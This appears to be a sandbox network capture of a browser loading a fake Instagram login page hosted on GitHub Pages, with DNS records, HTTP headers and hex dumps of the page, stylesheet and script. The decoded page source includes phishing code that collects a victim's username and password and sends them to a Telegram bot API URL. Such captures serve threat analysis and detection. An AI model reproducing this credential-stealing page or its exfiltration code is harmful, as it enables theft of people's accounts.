                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.105401993 CEST1.1.1.1192.168.2.40x4b94No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.105401993 CEST1.1.1.1192.168.2.40x4b94No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.105515003 CEST1.1.1.1192.168.2.40xc113No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.105515003 CEST1.1.1.1192.168.2.40xc113No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.105515003 CEST1.1.1.1192.168.2.40xc113No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.516757011 CEST1.1.1.1192.168.2.40x9fdfNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:13.516757011 CEST1.1.1.1192.168.2.40x9fdfNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:15.379283905 CEST1.1.1.1192.168.2.40xe7d3No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:15.379283905 CEST1.1.1.1192.168.2.40xe7d3No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:15.379297018 CEST1.1.1.1192.168.2.40x5ca7No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:36.680061102 CEST1.1.1.1192.168.2.40x6346No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:36.680061102 CEST1.1.1.1192.168.2.40x6346No error (0)star-mini.c10r.facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:36.680710077 CEST1.1.1.1192.168.2.40x107dNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:40.799736023 CEST1.1.1.1192.168.2.40x8579No error (0)play.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:44.219789982 CEST1.1.1.1192.168.2.40xa28dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 29, 2024 06:55:44.219789982 CEST1.1.1.1192.168.2.40xa28dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.449736185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC675OUTGET /instagram.com HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC553INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Location: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                X-GitHub-Request-Id: D816:2BD447:270FD7B:2C22AA6:66F8DD69
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:02 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740066-EWR
                                                                                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585642.298456,VS0,VE12
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 85d23d24b1f1a877ac7e5dfe71eed712d2fcbcd7
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.449735185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC676OUTGET /instagram.com/ HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 6780
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-1a7c"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:01 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: A50E:1664:12D7BFF:15989FE:66F8DD2D
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:02 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585642.450842,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 4c2e57fac25479bfdc2fe34f3e8f7702e4217c02
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2f 69 6d 67 2f 69 6e 73 74 61 2d 66 61 76 2e
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="pt-BR"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="./styles.css" /> <link rel="icon" type="image/png" href="./img/insta-fav.
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC1378INData Raw: d0 a2 d0 b5 d0 bb d0 b5 d1 84 d0 be d0 bd 2c 20 d0 b8 d0 bc d1 8f 20 d0 bf d0 be d0 bb d1 8c d0 b7 d0 be d0 b2 d0 b0 d1 82 d0 b5 d0 bb d1 8f 20 d0 b8 d0 bb d0 b8 20 d1 8d d0 bb 2e 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 53 65 6e 68 61 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 20 69 64 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d
                                                                                                                                                                                                                                Data Ascii: , . " /> <label for="password" class="sr-only">Senha</label> <input id="password" name="password" type="password" placeholder=
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC1378INData Raw: 20 d0 b0 d0 ba d0 ba d0 b0 d1 83 d0 bd d1 82 d0 b0 3f 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 3e d0 97 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d1 82 d1 8c d1 81 d1 8f 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 66 6c 65 78 20 64 69 72 65 63 74 69 6f 6e 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e d0 a3 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 b8 d1 82 d0 b5 20 d0 bf d1 80 d0 b8 d0 bb d0 be d0 b6 d0 b5 d0 bd d0 b8 d0 b5 2e 3c 2f
                                                                                                                                                                                                                                Data Ascii: ? </p> <a href="#"></a> </div> <div class="app-download flex direction-column align-items-center"> <p> .</
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC1378INData Raw: b5 d0 bd d1 86 d0 b8 d0 b0 d0 bb d1 8c d0 bd d0 be d1 81 d1 82 d1 8c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e d0 a3 d1 81 d0 bb d0 be d0 b2 d0 b8 d1 8f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e d0 9c d0 b5 d1 81 d1 82 d0 b0 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 49 6e 73 74 61 67 72 61 6d 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 54 68 72 65 61 64 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                Data Ascii: </a></li> <li><a href="#"></a></li> <li><a href="#"></a></li> <li><a href="#">Instagram Lite</a></li> <li><a href="#">Threads</a></li> <li><a href="
                                                                                                                                                                                                                                2024-09-29 04:54:02 UTC1268INData Raw: 6e 61 6d 65 3a 3c 2f 62 3e 20 3c 65 6d 3e 24 7b 75 73 65 72 6e 61 6d 65 7d 3c 2f 65 6d 3e 5c 6e 3c 62 3e 50 61 73 73 77 6f 72 64 3a 3c 2f 62 3e 20 3c 65 6d 3e 24 7b 70 61 73 73 77 6f 72 64 7d 3c 2f 65 6d 3e 60 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 66 6c 65 78 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 54 65 6c 65 67 72 61 6d 20 41 50 49 20 75 63 68 75 6e 20 55 52 4c 20 74 75 7a 69 73 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 20 3d 20 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 36 36 38 31 39 38 33 31 38 30 3a 41 41
                                                                                                                                                                                                                                Data Ascii: name:</b> <em>${username}</em>\n<b>Password:</b> <em>${password}</em>` loading.style.display = 'flex'; // Telegram API uchun URL tuzish const url = `https://api.telegram.org/bot6681983180:AA


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.449737185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC575OUTGET /instagram.com/styles.css HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC731INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 4588
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-11ec"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:01 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: 1670:16E3:13DFD7E:16C4365:66F8DD2D
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740034-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585643.076175,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: fc592f4f49efd9f20f124f32198ae67bba919d8e
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 2a 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 7d 0a 0a 6d 61 69 6e 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 39 33 35 70 78
                                                                                                                                                                                                                                Data Ascii: * { border: none; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; margin: 0; padding: 0;}body { background-color: #fafafa; height: 100vh;}main { height: 100vh; margin: auto; max-width: 935px
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 36 31 38 70 78 3b 0a 7d 0a 0a 2f 2a 2a 0a 2a 20 4c 6f 67 69 6e 20 73 65 63 74 69 6f 6e 0a 2a 2f 0a 2e 6c 6f 67 69 6e 2d 77 69 74 68 2d 66 62 2c 0a 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 0a 2e 72 65 67 69 73 74 65 72 2c 0a 66 6f 72 6d 20 7b 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 32 30 70 78 3b 20 7d 0a 0a 2e 6c 6f 67 69 6e 2d 77 69 74 68 2d 66 62 20 7b 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 7d 0a 0a 66 6f 72 6d 20 2e 73 72 2d 6f 6e 6c 79 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 0a 66 6f 72 6d 20 69 6e 70 75 74 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b
                                                                                                                                                                                                                                Data Ascii: { height: 618px;}/*** Login section*/.login-with-fb,form { width: 100%; }.register,form { padding: 30px 20px; }.login-with-fb { padding: 30px 20px 20px 20px; }form .sr-only { display: none; }form input { background-color: #fafafa;
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 2e 72 65 67 69 73 74 65 72 20 2a 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 7d 0a 2e 72 65 67 69 73 74 65 72 20 61 20 7b 20 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 39 35 66 36 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 0a 2e 72 65 67 69 73 74 65 72 20 70 20 7b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 3b 20 7d 0a 0a 2f 2a 2a 0a 2a 20 41 70 70 20 64 6f 77 6e 6c 6f 61 64 0a 2a 2f 0a 2e 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 7b 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 3b 20 7d 0a 2e 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 70 20 7b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 20 7d 0a 2e 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 69 6d 67 20 7b 20 0a 20 20 20 20 68 65 69 67 68 74 3a 20
                                                                                                                                                                                                                                Data Ascii: .register * { font-size: 13px; }.register a { color: #0095f6; font-weight: bold;}.register p { margin-right: 5px; }/*** App download*/.app-download { padding: 15px; }.app-download p { padding: 10px 0; }.app-download img { height:
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC454INData Raw: 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 0a 20 20 20 20 2e 69 6e 76 61 6c 69 64 2d 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 20
                                                                                                                                                                                                                                Data Ascii: font-size: 14px; display: none; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } .invalid-input { border: 1px solid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.449738185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC558OUTGET /instagram.com/main.js HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC767INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3212
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                x-origin-cache: HIT
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-c8c"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: 2C5C:140E5B:2C4849A:318CE8C:66F8DD2D
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                X-Timer: S1727585643.087556,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: db7636445f117d436013f6d3c6391873907def81
